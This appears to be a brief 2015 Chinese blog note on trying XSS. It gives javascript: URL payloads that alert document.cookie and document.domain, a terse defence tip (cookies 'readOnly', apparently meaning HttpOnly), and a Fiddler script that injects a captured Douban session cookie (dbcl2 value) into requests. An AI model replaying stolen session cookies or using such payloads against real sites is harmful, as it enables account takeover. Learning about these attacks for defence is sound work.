xss小试

javascript:alert(document.cookie)
javascript:alert(document.domain)

预防： HTTP cookie设置为readOnly

豆瓣 cookie

OnBeforeRequest

if(oSession.uriContains("douban"))
{
var sCookie="dbcl2=\"133786178:Y28Yw+Uq6/k\"";
oSession.oRequest["Cookie"]=sCookie;
}

posted @ 2015-08-29 10:45 to be crazy 阅读(270) 评论(0) 编辑收藏举报

刷新页面返回顶部

to be crazy